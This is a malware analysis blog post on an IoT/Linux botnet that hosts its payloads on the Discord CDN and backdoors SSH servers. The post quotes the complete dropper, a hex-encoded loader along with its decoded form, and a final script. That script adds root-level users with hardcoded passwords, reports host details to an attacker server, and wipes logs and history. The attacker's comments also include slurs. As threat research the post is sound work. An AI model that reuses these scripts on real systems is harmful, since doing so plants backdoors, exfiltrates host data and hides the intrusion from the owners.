In a recent tweet, the malware researcher @0xrb shared a list containing URLs of recently captured IoT botnet samples. Among the links there was an uncommon example, a URL behind a Discord CDN, which as pointed by the IoT malware researcher @_lubiedo, may be difficult to block.
Summary: The malware author claims to be doing these infections for ‘research purposes’, or in his words to test which servers would stay active with infection unnoticed for the longest period (by infection we refer to adding users for remote ssh access). The ‘no harm research purposes’ claim is backed by making the final stage of the infection a shell-script rather than a compiled binary which would require more time to reverse engineer. Also, the stage 1 binary payload is not obfuscated/packed. This botnet malware backdoors Linux devices with SSH access by adding users.
Interesting bits:
network IDS / blacklist evasion -> Discord CDN for binary distribution over HTTPS rather than VPS boxes (the typical way)
Anti-sandbox and EDR / Antivirus evasion -> Use of timeouts, removes logs and bash history, echoed hex-strings as intermediate payload
Stage 1:
The infection starts with fetching a shell-script from the URL below and executing it:
hxxps://cdn.discordapp.com/attachments/779820448182960152/780735645169352765/ugyuftyufydurdiytyabins.sh
|
1 2 3 4 5 6 7 8 9 10 11 12 13 |
#!/bin/bash cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget https://cdn.discordapp.com/attachments/780731895721492502/780732479996428288/mips; chmod +x mips; ./mips; rm -rf mips cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget https://cdn.discordapp.com/attachments/780731895721492502/780732483510599700/mipsel; chmod +x mipsel; ./mipsel; rm -rf mipsel cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget https://cdn.discordapp.com/attachments/780731895721492502/780732432163799040/sh4; chmod +x sh4; ./sh4; rm -rf sh4 cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget https://cdn.discordapp.com/attachments/780731895721492502/780732439554687006/x86; chmod +x x86; ./x86; rm -rf x86 cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget https://cdn.discordapp.com/attachments/780731895721492502/780732462300659732/armv6l; chmod +x armv6l; ./armv6l; rm -rf armv6l cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget https://cdn.discordapp.com/attachments/780731895721492502/780732470899376128/i686; chmod +x i686; ./i686; rm -rf i686 cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget https://cdn.discordapp.com/attachments/780731895721492502/780732420395237416/powerpc; chmod +x powerpc; ./powerpc; rm -rf powerpc cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget https://cdn.discordapp.com/attachments/780731895721492502/780732465059987476/i586; chmod +x i586; ./i586; rm -rf i586 cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget https://cdn.discordapp.com/attachments/780731895721492502/780732474173947934/m68k; chmod +x m68k; ./m68k; rm -rf m68k cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget https://cdn.discordapp.com/attachments/780731895721492502/780732437822046228/sparc; chmod +x sparc; ./sparc; rm -rf sparc cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget https://cdn.discordapp.com/attachments/780731895721492502/780732445711663124/armv4l; chmod +x armv4l; ./armv4l; rm -rf armv4l cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget https://cdn.discordapp.com/attachments/780731895721492502/780732453115527208/armv5l; chmod +x armv5l; ./armv5l; rm -rf armv5l |
When it comes to IoT/Linux botnets, the shell-scripts are typically used for downloading and executing cross-compiled binaries of the botnet. In this analysis, we’ll look at the binary sample compiled for Intel x86 CPU.
URL: htxxps://cdn.discordapp.com/attachments/780731895721492502/780732439554687006/x86
Binary name:x86
SHA256: 3a09d7ff4e492c9df2ddd9f547d0307d8e57dabebfb0bb8673c0c078deda6232
Virustotal: https://www.virustotal.com/gui/file/3a09d7ff4e492c9df2ddd9f547d0307d8e57dabebfb0bb8673c0c078deda6232/detection
The x86 sample is detected by 42/62 AV engines. This is not strange since the sample is not obfuscated using packers or string encoding.
Stage 2:
The x86 sample (stage 1) makes an HTTP GET request to a URL: hxxp://45.11.181.37/…/vivid
The web server responds as follows:
|
1 |
(echo -en "\\x28\\x77\\x68\\x69\\x6c\\x65\\x20\\x74\\x72\\x75\\x65\\x3b\\x64\\x6f\\x20\\x28\\x73\\x6c\\x65\\x65\\x70\\x20\\x24\\x28\\x28\\x20\\x52\\x41\\x4e\\x44\\x4f\\x4d\\x20\\x25\\x20\\x32\\x30\\x30\\x20\\x29\\x29\\x3b\\x28\\x70\\x72\\x69\\x6e\\x74\\x66\\x20\\x22\\x28\\x77\\x67\\x65\\x74\\x20\\x2d\\x71\\x20\\x22\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x61\\x79\\x2e\\x65\\x6e\\x65\\x72\\x67\\x79\\x2f\\x2e\\x2e\\x2e\\x2f\\x6f\\x73\\x22\\x20\\x2d\\x4f\\x20\\x2e\\x2e\\x2e\\x2e\\x20\\x3b\\x63\\x68\\x6d\\x6f\\x64\\x20\\x37\\x37\\x37\\x20\\x2e\\x2e\\x2e\\x2e\\x20\\x3b\\x2e\\x2f\\x2e\\x2e\\x2e\\x2e\\x20\\x3b\\x20\\x72\\x6d\\x20\\x2d\\x72\\x66\\x20\\x2e\\x2e\\x2e\\x2e\\x20\\x3b\\x63\\x6c\\x65\\x61\\x72\\x3b\\x63\\x6c\\x65\\x61\\x72\\x3b\\x68\\x69\\x73\\x74\\x6f\\x72\\x79\\x20\\x2d\\x63\\x29\\x20\\x3e\\x20\\x2f\\x64\\x65\\x76\\x2f\\x6e\\x75\\x6c\\x6c\\x20\\x32\\x3e\\x26\\x31\\x22\\x7c\\x62\\x61\\x73\\x68\\x29\\x20\\x26\\x20\\x3e\\x20\\x2f\\x64\\x65\\x76\\x2f\\x6e\\x75\\x6c\\x6c\\x20\\x32\\x3e\\x26\\x31\\x29\\x20\\x26\\x20\\x73\\x6c\\x65\\x65\\x70\\x20\\x34\\x33\\x32\\x30\\x30\\x3b\\x64\\x6f\\x6e\\x65\\x20\\x26\\x20\\x64\\x69\\x73\\x6f\\x77\\x6e\\x20\\x26\\x29\\x3e\\x20\\x2f\\x64\\x65\\x76\\x2f\\x6e\\x75\\x6c\\x6c\\x20\\x32\\x3e\\x26\\x31\\x20\\x26\\x20\\x63\\x6c\\x65\\x61\\x72\\x3b\\x63\\x6c\\x65\\x61\\x72\\x3b\\x68\\x69\\x73\\x74\\x6f\\x72\\x79\\x20\\x2d\\x63"|bash) > /dev/null 2>&1 |
The sequence of bytes is piped to bash directly and not written to a file on the machine, as it is typically done with the echoed hex strings payload transfer technique, originally introduced by Hajime. The hex string resolves to the following sequence of shell commands:
|
1 |
(while true;do (sleep $(( RANDOM % 200 ));(printf "(wget -q "http://gay.energy/.../os" -O .... ;chmod 777 .... ;./.... ; rm -rf .... ;clear;clear;history -c) > /dev/null 2>&1"|bash) & > /dev/null 2>&1) & sleep 43200;done & disown &)> /dev/null 2>&1 & clear;clear;history -c |
The sequence of commands fetched from the web server instructs the victim device to perform the following:
- Wait some time -> possible evasive behaviour against EDR/Antivirus and sandbox analysis
- Downloads the Stage 3 Payload hxxp://gay.energy/…/os
- Clears bash history
Stage 3:
The stage 3 payload, os, is also a shell-script, it performs the following actions:
- Adds users
- Makes a request to a PHP server that registers the newly infected/backdoored devices. The registration request contains the port of the SSH server on the victim device , the OS name, number of CPUs and RAM+SWAP memory available on the device.
- Removes logs and bash history
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 |
#!/bin/bash #Congrats You Found Me, I felt it was wrong to make this in C and not let any of you have a chance to remove it since its only #An Added Super User and can simply be removed, or password changed. #Hit Up My Discord: CodeAbuse#1263 #For Info to remove it or simply how. #BTW: I do not infect the servers or do anything with them, tbh i just watch cause im bored. 99% of them would ban with one dos attack. #Im simply watching to see which hosts last the longest for basic nets so ik there is a higher chance of my new project #surviving on them the longest. Call it research purposes. #Only doing this cause i dont really speak to a lot of ppl or watch that much any more so it just keeps me in the loop a bit. KillMe="$(echo -e "${0}"|tr -d './')" function LogyLog(){ if [ -f /usr/bin/yum ]; then wget -qO- "http://gay.energy/WelcomeNewBotBuddy/OwO.php?HOLETOFUCK=$(grep -Ew "#Port|Port" /etc/ssh/sshd_config|awk '{print $2}'|head -n1)&OSCHECKNIGNOG=CENTYBITCH&RUNNINGOS=$(cat /etc/system-release|head -n1)&TOTALCPU=$(nproc --all|head -n1)&TOTALRAM=$(free -mt|grep "Total:"|awk '{print $2}'|head -n1)&HOWTFELSEDOIGETIN=PwzLetMeInYourServerSoWeCanFuckSenpaiCodeAbuse" > /dev/null curl -s "http://gay.energy/WelcomeNewBotBuddy/OwO.php?HOLETOFUCK=$(grep -Ew "#Port|Port" /etc/ssh/sshd_config|awk '{print $2}'|head -n1)&OSCHECKNIGNOG=CENTYBITCH&RUNNINGOS=$(cat /etc/system-release|head -n1)&TOTALCPU=$(nproc --all|head -n1)&TOTALRAM=$(free -mt|grep "Total:"|awk '{print $2}'|head -n1)&HOWTFELSEDOIGETIN=PwzLetMeInYourServerSoWeCanFuckSenpaiCodeAbuse" > /dev/null clear;clear;rm -rf .bash_history;rm -rf /root/.bash_history;history -c elif [ -f /usr/bin/apt-get ]; then wget -qO- "http://gay.energy/WelcomeNewBotBuddy/OwO.php?HOLETOFUCK=$(grep -Ew "#Port|Port" /etc/ssh/sshd_config|awk '{print $2}'|head -n1)&OSCHECKNIGNOG=DUBIUNTUBITCH&RUNNINGOS=$(lsb_release -d|awk '{$1= ""; print $0}'|head -n1)&TOTALCPU=$(nproc --all|head -n1)&TOTALRAM=$(free -mt|grep "Total:"|awk '{print $2}')&HOWTFELSEDOIGETIN=PwzLetMeInYourServerSoWeCanFuckSenpaiCodeAbuse" > /dev/null curl -s "http://gay.energy/WelcomeNewBotBuddy/OwO.php?HOLETOFUCK=$(grep -Ew "#Port|Port" /etc/ssh/sshd_config|awk '{print $2}'|head -n1)&OSCHECKNIGNOG=DUBIUNTUBITCH&RUNNINGOS=$(lsb_release -d|awk '{$1= ""; print $0}'|head -n1)&TOTALCPU=$(nproc --all|head -n1)&TOTALRAM=$(free -mt|grep "Total:"|awk '{print $2}')&HOWTFELSEDOIGETIN=PwzLetMeInYourServerSoWeCanFuckSenpaiCodeAbuse" > /dev/null clear;clear;rm -rf .bash_history;rm -rf /root/.bash_history;history -c fi } #Very Simple To Do Yet Not Noticed That Much? (useradd -o -u 0 -g 0 -M -d /root -s /bin/bash system; echo -e "G2PHFW3yUkTvdZ86v2aj\nG2PHFW3yUkTvdZ86v2aj" | passwd system;LogyLog; rm -rf /var/log/lastlog;clear;clear;history -c)> /dev/null 2>&1 & clear;clear;history -c (useradd -o -u 0 -g 0 -M -d /root -s /bin/bash os; echo -e "s2FF4rHxDJuKwj8V5wCg\ns2FF4rHxDJuKwj8V5wCg" | passwd os;LogyLog; rm -rf /var/log/lastlog;clear;clear;history -c)> /dev/null 2>&1 & clear;clear;history -c (useradd -o -u 0 -g 0 -M -d /root -s /bin/bash passwd; echo -e "fwZ4HmvXWC5m7V4EyzQ5\nfwZ4HmvXWC5m7V4EyzQ5" | passwd passwd;LogyLog; rm -rf /var/log/lastlog;clear;clear;history -c)> /dev/null 2>&1 & clear;clear;history -c (useradd -o -u 0 -g 0 -M -d /root -s /bin/bash bash; echo -e "AhdaVjd9TfzBFGW84pYw\nAhdaVjd9TfzBFGW84pYw" | passwd bash;LogyLog; rm -rf /var/log/lastlog;clear;clear;history -c)> /dev/null 2>&1 & clear;clear;history -c (useradd -o -u 0 -g 0 -M -d /root -s /bin/bash shell; echo -e "U3YznCMKqNXhVcYLMyX2\nU3YznCMKqNXhVcYLMyX2" | passwd shell;LogyLog; rm -rf /var/log/lastlog;clear;clear;history -c)> /dev/null 2>&1 & clear;clear;history -c jobs;clear;clear;rm -rf .bash_history;rm -rf /root/.bash_history;history -c;exit rm -rf ${KillMe} rm -rf .bash_history;rm -rf /root/.bash_history history -c exit |
PHP server that handles registration of new infected devices: hxxp://gay.energy/WelcomeNewBotBuddy/OwO.php
Pingback: SSH-backdoor Botnet With ‘Research’ Infection TechniqueSecurity Affairs
Pingback: RSS – SSH-backdoor Botnet With ‘Research’ Infection Technique - Cybercrimes Live
Pingback: Descubren una botnet de dispositivos IoT desplegada con «propósitos de investigación» — Una al Día